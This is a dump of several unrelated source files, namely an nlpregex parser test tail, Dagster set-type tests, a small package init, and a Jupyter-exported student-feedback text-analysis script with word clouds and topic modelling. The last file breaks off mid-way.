( [ token02 token01 ] ( ( T01 [ token07 token08 ] ){ 2, 7 } ) [ token03 token04 ] )
( [ token02 token01 ] ( T01* ) [ token03 token04 ] )
( [ token02 token01 ] ( ( T01 [ token07 token08 ] )* ) [ token03 token04 ] )
( [ token02 token01 ] ( T01+ ) [ token03 token04 ] )
( [ token02 token01 ] ( ( T01 [ token07 token08 ] )+ ) [ token03 token04 ] )
'''
spec_expected = '( t01 t02 <nt02> )+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ast01 = parser.parse_lines( spec01 )
str01 = ast01.emit_formatted_text(80, 4, True)
# self.assertEqual( str01, spec_expected )
# ast01.draw('tmp_ast', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('tmp_fst', show_out_token = True, view_now = True, out_format = "pdf" )
dfa01 = DFA_from_NFA(fst01)
# dfa01.draw('tmp_fst', show_out_token = True, view_now = True, out_format = "pdf" )
if __name__ == '__main__':
unittest.main()
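# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original suite): the pipeline the tests
# above exercise, end to end, using only APIs already seen in this file
# (LarkParser.parse_lines, emit_formatted_text, generate_fst, DFA_from_NFA):
#
#     parser = nlpregex.regular_language.lark_parser.LarkParser()
#     ast    = parser.parse_lines(' t01 | t02 ')    # spec text -> AST
#     text   = ast.emit_formatted_text(80, 4, True) # AST -> canonical spec
#     nfa    = ast.generate_fst(True)               # AST -> NFA transducer
#     dfa    = DFA_from_NFA(nfa)                    # NFA -> deterministic FST
# ---------------------------------------------------------------------------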

d21d568a72cdb7a7ca7013826560d1272ef478cd | 3,605 | py | Python
python_modules/dagster/dagster_tests/core_tests/runtime_types_tests/test_python_set.py
pseudoPixels/dagster @ ac78bdbec54754d35f51d706fc5b0bacfe49f2bf | ["Apache-2.0"]
import typing
import pytest
from dagster import (
DagsterTypeCheckError,
InputDefinition,
Optional,
OutputDefinition,
execute_solid,
lambda_solid,
)
from dagster.core.types.runtime.python_set import create_typed_runtime_set
from dagster.core.types.runtime.runtime_type import resolve_to_runtime_type
def test_vanilla_set_output():
@lambda_solid(output_def=OutputDefinition(set))
def emit_set():
return {1, 2}
assert execute_solid(emit_set).output_value() == {1, 2}
def test_vanilla_set_output_fail():
@lambda_solid(output_def=OutputDefinition(set))
def emit_set():
return 'foo'
with pytest.raises(DagsterTypeCheckError):
execute_solid(emit_set)
def test_vanilla_set_input():
@lambda_solid(input_defs=[InputDefinition(name='tt', dagster_type=set)])
def take_set(tt):
return tt
assert execute_solid(take_set, input_values={'tt': {2, 3}}).output_value() == {2, 3}
def test_vanilla_set_input_fail():
@lambda_solid(input_defs=[InputDefinition(name='tt', dagster_type=set)])
def take_set(tt):
return tt
with pytest.raises(DagsterTypeCheckError):
execute_solid(take_set, input_values={'tt': 'fkjdf'})
def test_open_typing_set_output():
@lambda_solid(output_def=OutputDefinition(typing.Set))
def emit_set():
return {1, 2}
assert execute_solid(emit_set).output_value() == {1, 2}
def test_open_typing_set_output_fail():
@lambda_solid(output_def=OutputDefinition(typing.Set))
def emit_set():
return 'foo'
with pytest.raises(DagsterTypeCheckError):
execute_solid(emit_set)
def test_open_typing_set_input():
@lambda_solid(input_defs=[InputDefinition(name='tt', dagster_type=typing.Set)])
def take_set(tt):
return tt
assert execute_solid(take_set, input_values={'tt': {2, 3}}).output_value() == {2, 3}
def test_open_typing_set_input_fail():
@lambda_solid(input_defs=[InputDefinition(name='tt', dagster_type=typing.Set)])
def take_set(tt):
return tt
with pytest.raises(DagsterTypeCheckError):
execute_solid(take_set, input_values={'tt': 'fkjdf'})
def test_runtime_set_of_int():
set_runtime_type = create_typed_runtime_set(int).inst()
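# create_typed_runtime_set(int) builds the runtime type for a set of ints, and
# .inst() returns the checkable instance: type_check() passes for {1} and the
# empty set below, and fails for None, for non-set values, and for sets whose
# members are not ints.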
set_runtime_type.type_check({1})
set_runtime_type.type_check(set())
res = set_runtime_type.type_check(None)
assert not res.success
res = set_runtime_type.type_check('nope')
assert not res.success
res = set_runtime_type.type_check({'nope'})
assert not res.success
def test_runtime_optional_set():
set_runtime_type = resolve_to_runtime_type(Optional[create_typed_runtime_set(int)])
set_runtime_type.type_check({1})
set_runtime_type.type_check(set())
set_runtime_type.type_check(None)
res = set_runtime_type.type_check('nope')
assert not res.success
res = set_runtime_type.type_check({'nope'})
assert not res.success
def test_closed_typing_set_input():
@lambda_solid(input_defs=[InputDefinition(name='tt', dagster_type=typing.Set[int])])
def take_set(tt):
return tt
assert execute_solid(take_set, input_values={'tt': {2, 3}}).output_value() == {2, 3}
def test_closed_typing_set_input_fail():
@lambda_solid(input_defs=[InputDefinition(name='tt', dagster_type=typing.Set[int])])
def take_set(tt):
return tt
with pytest.raises(DagsterTypeCheckError):
execute_solid(take_set, input_values={'tt': 'fkjdf'})
with pytest.raises(DagsterTypeCheckError):
execute_solid(take_set, input_values={'tt': {'fkjdf'}})
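# Taken together: OutputDefinition(set) and typing.Set only require that the
# value be a set, while typing.Set[int] (backed by create_typed_runtime_set)
# also checks each member, so {'fkjdf'} fails where {2, 3} passes.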

d2300a99826e536597dfbcce4722a90f6d350735 | 89 | py | Python
DATnet-master/utils/__init__.py
limit-scu/2019-TPAMI-DATNet @ 30ade0642928217541b76b0152382894b7ab73ea | ["MIT"] | 1 star (2019-11-08T02:45:08.000Z)
from utils.data_utils import *
from utils.logger import *

d27bbd10baaf9903aea66a53d0b9dfafd5f86b3f | 88,025 | py | Python
SSP3_version1.py
ShivamGaurUQ/Student_Staff_Partnership_Project @ 18fc694bffc3ffb531cea53199e47581834f8bef | ["MIT"] | 1 star (2019-09-11T15:05:28.000Z)
# coding: utf-8
# <h1><center>Student Feedback Data Analysis</center></h1>
# <img src="analytics.jpg" width="500" height="100" align="center"/>
# In[47]:
#import libraries
import nltk
from nltk.corpus import wordnet as wn
from nltk import pos_tag, word_tokenize
import xlrd
nltk.download('averaged_perceptron_tagger')
import ipywidgets as widgets
from ipywidgets import HBox, VBox
import numpy as np
import matplotlib.pyplot as plt
from IPython.display import display
get_ipython().run_line_magic('matplotlib', 'inline')
from pandas import DataFrame, read_csv
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
from wordcloud import WordCloud, STOPWORDS, ImageColorGenerator
from nltk.corpus import stopwords
import nltk as nl
nl.download('punkt',quiet=True)
nl.download('stopwords',quiet=True)
from nltk.tokenize import word_tokenize
from nltk.stem.porter import PorterStemmer
import collections
from nltk.text import Text
import re
from nltk.collocations import BigramAssocMeasures, BigramCollocationFinder
from operator import itemgetter
from nltk.stem.wordnet import WordNetLemmatizer
import string
import gensim
from gensim import corpora
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
from ipywidgets import Button, HBox, VBox, Layout, Box
from IPython.display import display
from IPython.display import clear_output
import pyLDAvis
import pyLDAvis.gensim
from sklearn.decomposition import LatentDirichletAllocation
from sklearn.feature_extraction.text import CountVectorizer
import pyLDAvis.sklearn
from pivottablejs import pivot_ui
import os
import sys
import tkinter as tk
from pandas.api.types import is_string_dtype
import sys
sys.tracebacklimit=0
# Modify the path
sys.path.append("..")
import yellowbrick as yb
from tkinter import filedialog
# In[108]:
##########################################################################
# Imports
##########################################################################
from yellowbrick.text.base import TextVisualizer
##########################################################################
# PosTagVisualizer
##########################################################################
class PosTagVisualizer(TextVisualizer):
"""
A part-of-speech tag visualizer colorizes text to enable
the user to visualize the proportions of nouns, verbs, etc.
and to use this information to make decisions about text
normalization (e.g. stemming vs lemmatization) and
vectorization.
Parameters
----------
kwargs : dict
Pass any additional keyword arguments to the super class.
cmap : dict
ANSII colormap
These parameters can be influenced later on in the visualization
process, but can and should be set as early as possible.
"""
def __init__(self, ax=None, **kwargs):
super(PosTagVisualizer, self).__init__(ax=ax, **kwargs)
# TODO: hard-coding in the ANSII colormap for now.
# Can we let the user reset the colors here?
self.COLORS = {
'white' : "\033[0;37m{}\033[0m",
'yellow' : "\033[0;33m{}\033[0m",
'green' : "\033[0;32m{}\033[0m",
'blue' : "\033[0;34m{}\033[0m",
'cyan' : "\033[0;36m{}\033[0m",
'red' : "\033[0;31m{}\033[0m",
'magenta' : "\033[0;35m{}\033[0m",
'black' : "\033[0;30m{}\033[0m",
'darkwhite' : "\033[1;37m{}\033[0m",
'darkyellow' : "\033[1;33m{}\033[0m",
'darkgreen' : "\033[1;32m{}\033[0m",
'darkblue' : "\033[1;34m{}\033[0m",
'darkcyan' : "\033[1;36m{}\033[0m",
'darkred' : "\033[1;31m{}\033[0m",
'darkmagenta': "\033[1;35m{}\033[0m",
'darkblack' : "\033[1;30m{}\033[0m",
None : "\033[0;0m{}\033[0m"
}
self.TAGS = {
'NN' : 'green',
'NNS' : 'green',
'NNP' : 'green',
'NNPS' : 'green',
'VB' : 'blue',
'VBD' : 'blue',
'VBG' : 'blue',
'VBN' : 'blue',
'VBP' : 'blue',
'VBZ' : 'blue',
'JJ' : 'red',
'JJR' : 'red',
'JJS' : 'red',
'RB' : 'cyan',
'RBR' : 'cyan',
'RBS' : 'cyan',
'IN' : 'darkwhite',
'POS' : 'darkyellow',
'PRP$' : 'magenta',
'DT' : 'black',
'CC' : 'black',
'CD' : 'black',
'WDT' : 'black',
'WP' : 'black',
'WP$' : 'black',
'WRB' : 'black',
'EX' : 'yellow',
'FW' : 'yellow',
'LS' : 'yellow',
'MD' : 'yellow',
'PDT' : 'yellow',
'RP' : 'yellow',
'SYM' : 'yellow',
'TO' : 'yellow',
'None' : 'off'
}
def colorize(self, token, color):
return self.COLORS[color].format(token)
def transform(self, tagged_tuples):
self.tagged = [
(self.TAGS.get(tag),tok) for tok, tag in tagged_tuples
]
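# Minimal usage sketch (illustrative only; assumes the NLTK tagger data
# downloaded above is available):
#
#     viz = PosTagVisualizer()
#     viz.transform(pos_tag(word_tokenize("The quick brown fox jumps")))
#     print(' '.join(viz.colorize(tok, color) for color, tok in viz.tagged))
#
# transform() stores (color, token) pairs, and colorize() wraps each token in
# the ANSI escape sequence for its part-of-speech color.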
# In[116]:
class SSP:
def __init__(self):
self.words = ['Data Settings','Explore','Visualize', 'WordClouds','Topic Modelling','Sentiment Analysis','Text Summarization']
self.items = [Button(description=w,button_style='info', # 'success', 'info', 'warning', 'danger' or ''
layout=Layout(width='175px')) for w in self.words]
display(HBox([item for item in self.items]))
np.warnings.filterwarnings('ignore')
self.import_data=widgets.Button(
description='Import New Data',
disabled=False,
button_style='warning', # 'success', 'info', 'warning', 'danger' or ''
tooltip='Click to import new data',
icon='check'
)
display(self.import_data)
self.file_path=""
self.sheet=""
self.att=""
self.org_df=""
self.import_data.on_click(self.new_data)
self.items[0].on_click(self.preview_data)
self.items[1].on_click(self.explore_data)
self.items[2].on_click(self.vis_data)
self.items[3].on_click(self.wc_data)
self.items[4].on_click(self.tm_data)
self.items[5].on_click(self.sa_data)
self.items[6].on_click(self.ts_data)
def new_data(self,b):
from tkinter import filedialog
root = tk.Tk()
root.withdraw()
self.file_path = filedialog.askopenfilename()
self.labelf=widgets.Label(value="Selected Data : "+str(self.file_path),layout=Layout(width='50%'))
self.org_df=pd.read_excel(self.file_path)
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(self.labelf)
def preview_data(self,b):
if len(self.file_path)==0:
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display("Please import new data")
else:
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
self.wb = xlrd.open_workbook(self.file_path)
self.sheets=self.wb.sheet_names()
self.sheet_to_index={}
i=0
while i<len(self.sheets):
self.sheet_to_index[self.sheets[i]]=i
i=i+1
self.sheet_drop=widgets.Dropdown(options=self.sheets,value=self.sheets[0],layout=Layout(width='50%'),description='Sheet:',tooltip='Select a working sheet',disabled=False,)
self.sheet=self.wb.sheet_by_index(self.sheet_to_index[self.sheet_drop.value])
self.cols=[]
for i in range(self.sheet.ncols):
self.cols.append(self.sheet.cell_value(0, i))
self.att_drop=widgets.Dropdown(options=self.cols,value=self.cols[0],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature for data cleaning and analysis',disabled=False,)
self.att=self.att_drop.value
self.item_display=[]
self.item_display.append(self.labelf)
self.item_display.append(self.sheet_drop)
self.item_display.append(self.att_drop)
display(HBox([item for item in self.item_display]))
#print("hi")
self.clean_choice=widgets.ToggleButtons(
options=['Original', 'Cleaned',],
value='Cleaned',
description='Use Data:',
layout=Layout(width='50%'),
disabled=False,
button_style='success', # 'success', 'info', 'warning', 'danger' or ''
tooltip='Description',
)
display(self.clean_choice)
self.df = pd.read_excel(self.file_path)
self.rem_value=widgets.Text(value='-No Answer-',placeholder='Type missing value indicator',layout=Layout(width='50%'),description='Missing value:',disabled=False)
if self.clean_choice.value=='Cleaned':
self.df_cleaned=self.df.dropna()
self.rem_value=widgets.Text(value='-No Answer-',placeholder='Type missing value indicator',layout=Layout(width='50%'),description='Missing value:',disabled=False)
display(self.rem_value)
self.df_cleaned = self.df_cleaned[self.df_cleaned[self.att_drop.value] != self.rem_value.value]
self.df_cleaned = self.df_cleaned.reset_index(drop=True)
self.org_df=self.df_cleaned
print("\nData cleaned by removing NaN values and rows with value = "+ self.rem_value.value + " in the column " + self.att_drop.value)
print("\nA peek into cleaned data\n")
print("\nThere are {} observations and {} features in cleaned dataset \n".format(self.df_cleaned.shape[0],self.df_cleaned.shape[1]))
display(self.df_cleaned.head())
def choice_disp(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(HBox([item for item in self.item_display]))
display(self.clean_choice)
if self.clean_choice.value=='Original':
#print("\nThere are {} observations and {} features in original dataset and {} observations and {} features in cleaned dataset. \n".format(df.shape[0],df.shape[1],df_cleaned.shape[0],df_cleaned.shape[1]))
print("\nA peek into originl data\n")
print("\nThere are {} observations and {} features in original dataset \n".format(self.df.shape[0],self.df.shape[1]))
self.org_df=self.df
display(self.df.head())
else:
if self.clean_choice.value=='Cleaned':
self.df_cleaned=self.df.dropna()
display(self.rem_value)
self.df_cleaned = self.df_cleaned[self.df_cleaned[self.att_drop.value] != self.rem_value.value]
self.df_cleaned = self.df_cleaned.reset_index(drop=True)
self.org_df=self.df_cleaned
self.att=self.att_drop.value
print("\nData cleaned by removing NaN values and rows with value = "+ self.rem_value.value + " in the column " + self.att_drop.value)
print("\nA peek into cleaned data\n")
print("\nThere are {} observations and {} features in cleaned dataset \n".format(self.df_cleaned.shape[0],self.df_cleaned.shape[1]))
display(self.df_cleaned.head())
self.clean_choice.observe(choice_disp,'value')
self.rem_value.on_submit(choice_disp)
self.att_drop.observe(choice_disp, 'value')
def sheet_disp(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
self.sheet=self.wb.sheet_by_index(self.sheet_to_index[self.sheet_drop.value])
self.cols=[]
for i in range(self.sheet.ncols):
self.cols.append(self.sheet.cell_value(0, i))
self.att_drop=widgets.Dropdown(options=self.cols,value=self.cols[0],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature for data cleaning and analysis',disabled=False,)
self.att=self.att_drop.value
self.item_display=[]
self.item_display.append(self.labelf)
self.item_display.append(self.sheet_drop)
self.item_display.append(self.att_drop)
display(HBox([item for item in self.item_display]))
self.clean_choice=widgets.ToggleButtons(
options=['Original', 'Cleaned',],
value='Cleaned',
description='Use Data:',
layout=Layout(width='50%'),
disabled=False,
button_style='success', # 'success', 'info', 'warning', 'danger' or ''
tooltip='Description',
)
display(self.clean_choice)
self.df = pd.read_excel(self.file_path)
self.rem_value=widgets.Text(value='-No Answer-',placeholder='Type missing value indicator',layout=Layout(width='50%'),description='Missing value:',disabled=False)
if self.clean_choice.value=='Cleaned':
self.df_cleaned=self.df.dropna()
self.rem_value=widgets.Text(value='-No Answer-',placeholder='Type missing value indicator',layout=Layout(width='50%'),description='Missing value:',disabled=False)
display(self.rem_value)
self.df_cleaned = self.df_cleaned[self.df_cleaned[self.att_drop.value] != self.rem_value.value]
self.df_cleaned = self.df_cleaned.reset_index(drop=True)
self.org_df=self.df_cleaned
self.att=self.att_drop.value
print("\nData cleaned by removing NaN values and rows with value = "+ self.rem_value.value + " in the column " + self.att_drop.value)
print("\nA peek into cleaned data\n")
print("\nThere are {} observations and {} features in cleaned dataset \n".format(self.df_cleaned.shape[0],self.df_cleaned.shape[1]))
display(self.df_cleaned.head())
self.clean_choice.observe(choice_disp,'value')
self.rem_value.on_submit(choice_disp)
self.att_drop.observe(choice_disp, 'value')
self.sheet_drop.observe(sheet_disp, 'value')
def explore_data(self,b):
if self.sheet==None or self.sheet=="":
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display("Please change data settings before use")
else:
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
self.action_list=['View Data','Sort Data','Group Data by Feature']
self.action_drop=widgets.Dropdown(options=self.action_list,value=self.action_list[0],layout=Layout(width='50%'),description='Action:',tooltip='Select an action to perform',disabled=False,)
display(self.action_drop)
display(self.org_df)
def action(change):
flag=0
def change_order(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(self.action_drop)
display(self.sort_order)
if self.sort_order.value=='Ascending':
flag=0
self.sort_df = self.org_df.sort_values(by = self.att)
display(self.sort_df)
else:
flag=1
self.sort_df = self.org_df.sort_values(by = self.att,ascending=False)
display(self.sort_df)
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(self.action_drop)
if self.action_drop.value=='View Data':
display(self.org_df)
if self.action_drop.value=='Sort Data':
self.sort_order=widgets.RadioButtons(
options=['Ascending', 'Descending'],
value='Ascending',
description='Sorting order:',
disabled=False
)
display(self.sort_order)
self.sort_df = self.org_df.sort_values(by = self.att)
display(self.sort_df)
self.sort_order.observe(change_order,'value')
if self.action_drop.value=='Group Data by Feature':
self.feat = self.org_df.groupby(self.att_drop.value)
display(self.feat.describe())
self.action_drop.observe(action, 'value')
#display(HBox([item for item in self.item_display]))
def vis_data(self, b):
if self.sheet==None or self.sheet=="":
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display("Please change data settings before use")
else:
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Visualise feature distribution through Bar and Pie Chart",layout=Layout(width='50%')))
self.plotfeat_drop=widgets.Dropdown(options=self.cols,value=self.cols[0],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to plot distribution',disabled=False,)
display(self.plotfeat_drop)
entire_feature = self.org_df.groupby(self.plotfeat_drop.value)
#plot graph of selected distribution
_labels =self.org_df[self.plotfeat_drop.value].unique()
plt.figure(figsize=(20,20))
ax = plt.subplot(221)
ax.set_aspect(1)
entire_feature.size().sort_values(ascending=False).plot.pie(labels = _labels, autopct='%1.1f%%',legend = True, fontsize=20)
plt.ylabel('')
plt.title(str(self.plotfeat_drop.value)+' Distribution')
plt.grid(True)
plt.figure(figsize=(20,20))
plt.subplot(222)
entire_feature.size().sort_values(ascending=False).plot.bar(legend = True,fontsize=20)
plt.xticks(rotation=50)
plt.xticks(np.arange(2), _labels)
plt.ylabel('')
plt.xlabel('')
#might need to come up with a better graph title
plt.title(str(self.plotfeat_drop.value)+' Distribution')
plt.subplots_adjust(bottom=0.1, right=1.5, top=0.9)
plt.show()
def pie_plot(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Visualise feature distribution through Bar and Pie Chart",layout=Layout(width='50%')))
display(self.plotfeat_drop)
entire_feature = self.org_df.groupby(self.plotfeat_drop.value)
#plot graph of selected distribution
_labels =self.org_df[self.plotfeat_drop.value].unique()
#print(_labels)
plt.figure(figsize=(20,20))
ax = plt.subplot(221)
ax.set_aspect(1)
entire_feature.size().sort_values(ascending=False).plot.pie(labels = _labels, autopct='%1.1f%%',legend = True, fontsize=20)
plt.ylabel('')
plt.title(str(self.plotfeat_drop.value)+' Distribution')
plt.grid(True)
plt.figure(figsize=(20,20))
plt.subplot(222)
entire_feature.size().sort_values(ascending=False).plot.bar(legend = True,fontsize=20)
plt.xticks(rotation=50)
plt.xticks(np.arange(2), _labels)
plt.ylabel('')
plt.xlabel('')
#might need to come up with a better graph title
plt.title(str(self.plotfeat_drop.value)+' Distribution')
plt.subplots_adjust(bottom=0.1, right=1.5, top=0.9)
plt.show()
self.plotfeat_drop.observe(pie_plot,'value')
def wc_data(self,b):
try:
if self.sheet==None or self.sheet=="":
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display("Please change data settings before use")
else:
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Visualise Text through Word Clouds. Select a feature with text values only.",layout=Layout(width='50%')))
self.wc_drop=widgets.Dropdown(options=self.cols,value=self.cols[0],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.wc_drop)
#print(self.org_df[self.wc_drop.value].dtype)
#if is_string_dtype(self.org_df[self.wc_drop.value])==False:
#raise ValueError("That is not a suitable feature to generate WordCloud. Select a feature with text values only.")
all_reviews=self.org_df[self.wc_drop.value]
#tokenization,removing stopwords, punctuation and stemming
all_ans=""
for review in all_reviews:
all_ans=all_ans+review+"\n"
all_ans= all_ans.replace("'", "")
tokens=word_tokenize(all_ans)
tokens=[w.lower() for w in tokens]
text = nl.Text(tokens)
token_words=[word for word in tokens if word.isalpha()]
stopword=stopwords.words('english')
stopword.append('dont')
stopword.append('didnt')
stopword.append('doesnt')
stopword.append('cant')
stopword.append('couldnt')
stopword.append('couldve')
stopword.append('im')
stopword.append('ive')
stopword.append('isnt')
stopword.append('theres')
stopword.append('wasnt')
stopword.append('wouldnt')
stopword.append('a')
stopword.append('also')
token_words=[w for w in token_words if not w in stopword]
porter =PorterStemmer()
token_stemmed=[porter.stem(w) for w in token_words]
#clear_output()
#display(HBox([item for item in items]))
#creating wordcloud
#for w in token_words:
#if type(w)!="<class 'str'>":
#print(type(w))
#raise ValueError("That is not a suitable feature to generate WordCloud. Select a feature with text values only.")
cloudstring=(" ").join(token_words)
wordcloud = WordCloud(max_font_size=50,max_words=100, background_color="black").generate(cloudstring)
plt.figure(figsize=(20,20))
ax = plt.subplot(221)
# plot wordcloud in matplotlib
plt.imshow(wordcloud, interpolation="bilinear")
plt.axis("off")
plt.title("WordCloud")
plt.grid(True)
#plotting bi-gram cloud
# setup and score the bigrams using the raw frequency.
finder = BigramCollocationFinder.from_words(token_words)
bigram_measures = BigramAssocMeasures()
scored = finder.score_ngrams(bigram_measures.raw_freq)
scoredList = sorted(scored, key=itemgetter(1), reverse=True)
word_dict = {}
listLen = len(scoredList)
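# Joining each bigram with '_' makes WordCloud treat the pair as a single
# token, weighted by its raw-frequency score.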
for i in range(listLen):
word_dict['_'.join(scoredList[i][0])] = scoredList[i][1]
wordCloud = WordCloud(max_font_size=50, max_words=100, background_color="black")
plt.subplot(222)
wordCloud.generate_from_frequencies(word_dict)
plt.title('Most frequently occurring bigrams connected with an underscore_')
plt.imshow(wordCloud, interpolation='bilinear')
plt.axis("off")
plt.show()
#plotting frequency distribution
plt.figure(figsize=(25,5))
ax = plt.subplot(121)
freqdist = nl.FreqDist(token_words)
plt.subplot(121)
plt.title("Frequency Distribution of top 50 token words")
freqdist.plot(50)
def wc_change(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Visualise Text through Word Clouds. Select a feature with text values only.",layout=Layout(width='50%')))
#self.wc_drop=widgets.Dropdown(options=self.cols,value=self.cols[0],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.wc_drop)
#print(self.org_df[self.wc_drop.value].dtype)
#if is_string_dtype(self.org_df[self.wc_drop.value])==False:
#raise ValueError("That is not a suitable feature to generate WordCloud. Select a feature with text values only.")
all_reviews=self.org_df[self.wc_drop.value]
#tokenization,removing stopwords, punctuation and stemming
all_ans=""
for review in all_reviews:
all_ans=all_ans+review+"\n"
all_ans= all_ans.replace("'", "")
tokens=word_tokenize(all_ans)
tokens=[w.lower() for w in tokens]
text = nl.Text(tokens)
token_words=[word for word in tokens if word.isalpha()]
stopword=stopwords.words('english')
stopword.append('dont')
stopword.append('didnt')
stopword.append('doesnt')
stopword.append('cant')
stopword.append('couldnt')
stopword.append('couldve')
stopword.append('im')
stopword.append('ive')
stopword.append('isnt')
stopword.append('theres')
stopword.append('wasnt')
stopword.append('wouldnt')
stopword.append('a')
stopword.append('also')
token_words=[w for w in token_words if not w in stopword]
porter =PorterStemmer()
token_stemmed=[porter.stem(w) for w in token_words]
#clear_output()
#display(HBox([item for item in items]))
#creating wordcloud
#for w in token_words:
#if type(w)!='str':
#raise ValueError("That is not a suitable feature to generate WordCloud. Select a feature with text values only.")
cloudstring=(" ").join(token_words)
wordcloud = WordCloud(max_font_size=50,max_words=100, background_color="black").generate(cloudstring)
plt.figure(figsize=(20,20))
ax = plt.subplot(221)
# plot wordcloud in matplotlib
plt.imshow(wordcloud, interpolation="bilinear")
plt.axis("off")
plt.title("WordCloud")
plt.grid(True)
#plotting bi-gram cloud
# setup and score the bigrams using the raw frequency.
finder = BigramCollocationFinder.from_words(token_words)
bigram_measures = BigramAssocMeasures()
scored = finder.score_ngrams(bigram_measures.raw_freq)
scoredList = sorted(scored, key=itemgetter(1), reverse=True)
word_dict = {}
listLen = len(scoredList)
for i in range(listLen):
word_dict['_'.join(scoredList[i][0])] = scoredList[i][1]
wordCloud = WordCloud(max_font_size=50, max_words=100, background_color="black")
plt.subplot(222)
wordCloud.generate_from_frequencies(word_dict)
plt.title('Most frequently occurring bigrams connected with an underscore_')
plt.imshow(wordCloud, interpolation='bilinear')
plt.axis("off")
plt.show()
#plotting frequency distribution
plt.figure(figsize=(25,5))
ax = plt.subplot(121)
freqdist = nl.FreqDist(token_words)
plt.subplot(121)
plt.title("Frequency Distribution of top 50 token words")
freqdist.plot(50)
self.wc_drop.observe(wc_change,'value')
except Exception as ve:
print(ve)
print("That is not a suitable feature to generate WordCloud. Select a feature with text values only.")
def wc_change(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Visualise Text through Word Clouds. Select a feature with text values only.",layout=Layout(width='50%')))
#self.wc_drop=widgets.Dropdown(options=self.cols,value=self.cols[0],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.wc_drop)
#print(self.org_df[self.wc_drop.value].dtype)
#if is_string_dtype(self.org_df[self.wc_drop.value])==False:
#raise ValueError("That is not a suitable feature to generate WordCloud. Select a feature with text values only.")
all_reviews=self.org_df[self.wc_drop.value]
#tokenization,removing stopwords, punctuation and stemming
all_ans=""
for review in all_reviews:
all_ans=all_ans+review+"\n"
all_ans= all_ans.replace("'", "")
tokens=word_tokenize(all_ans)
tokens=[w.lower() for w in tokens]
text = nl.Text(tokens)
token_words=[word for word in tokens if word.isalpha()]
stopword=stopwords.words('english')
stopword.append('dont')
stopword.append('didnt')
stopword.append('doesnt')
stopword.append('cant')
stopword.append('couldnt')
stopword.append('couldve')
stopword.append('im')
stopword.append('ive')
stopword.append('isnt')
stopword.append('theres')
stopword.append('wasnt')
stopword.append('wouldnt')
stopword.append('a')
stopword.append('also')
token_words=[w for w in token_words if not w in stopword]
porter =PorterStemmer()
token_stemmed=[porter.stem(w) for w in token_words]
#clear_output()
#display(HBox([item for item in items]))
#creating wordcloud
#for w in token_words:
#if type(w)!='str':
#raise ValueError("That is not a suitable feature to generate WordCloud. Select a feature with text values only.")
cloudstring=(" ").join(token_words)
wordcloud = WordCloud(max_font_size=50,max_words=100, background_color="black").generate(cloudstring)
plt.figure(figsize=(20,20))
ax = plt.subplot(221)
# plot wordcloud in matplotlib
plt.imshow(wordcloud, interpolation="bilinear")
plt.axis("off")
plt.title("WordCloud")
plt.grid(True)
#plotting bi-gram cloud
# setup and score the bigrams using the raw frequency.
finder = BigramCollocationFinder.from_words(token_words)
bigram_measures = BigramAssocMeasures()
scored = finder.score_ngrams(bigram_measures.raw_freq)
scoredList = sorted(scored, key=itemgetter(1), reverse=True)
word_dict = {}
listLen = len(scoredList)
for i in range(listLen):
word_dict['_'.join(scoredList[i][0])] = scoredList[i][1]
wordCloud = WordCloud(max_font_size=50, max_words=100, background_color="black")
plt.subplot(222)
wordCloud.generate_from_frequencies(word_dict)
plt.title('Most frequently occurring bigrams connected with an underscore_')
plt.imshow(wordCloud, interpolation='bilinear')
plt.axis("off")
plt.show()
#plotting frequency distribution
plt.figure(figsize=(25,5))
ax = plt.subplot(121)
freqdist = nl.FreqDist(token_words)
plt.subplot(121)
plt.title("Frequency Distribution of top 50 token words")
freqdist.plot(50)
finally:
self.wc_drop.observe(wc_change,'value')
def tm_data(self,b):
try:
if self.sheet==None or self.sheet=="":
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display("Please change data settings before use")
else:
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Explore topics through topic modelling. Select a feature with text values only.",layout=Layout(width='50%')))
display(widgets.Label(value="Please be patient while the output is generated. This may take a few moments.",layout=Layout(width='50%')))
self.tm_drop=widgets.Dropdown(options=self.cols,value=self.cols[0],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.tm_drop)
#print(self.org_df[self.wc_drop.value].dtype)
#if is_string_dtype(self.org_df[self.wc_drop.value])==False:
#raise ValueError("That is not a suitable feature to generate WordCloud. Select a feature with text values only.")
data=self.org_df[self.tm_drop.value]
vectorizer = CountVectorizer(min_df=5, max_df=0.9,
stop_words='english', lowercase=True,
token_pattern='[a-zA-Z\-][a-zA-Z\-]{2,}')
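# min_df=5 / max_df=0.9 drop very rare and near-ubiquitous terms, and the
# token_pattern keeps only tokens of three or more letters (or hyphens).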
data_vectorized = vectorizer.fit_transform(data)
# Build a Latent Dirichlet Allocation Model
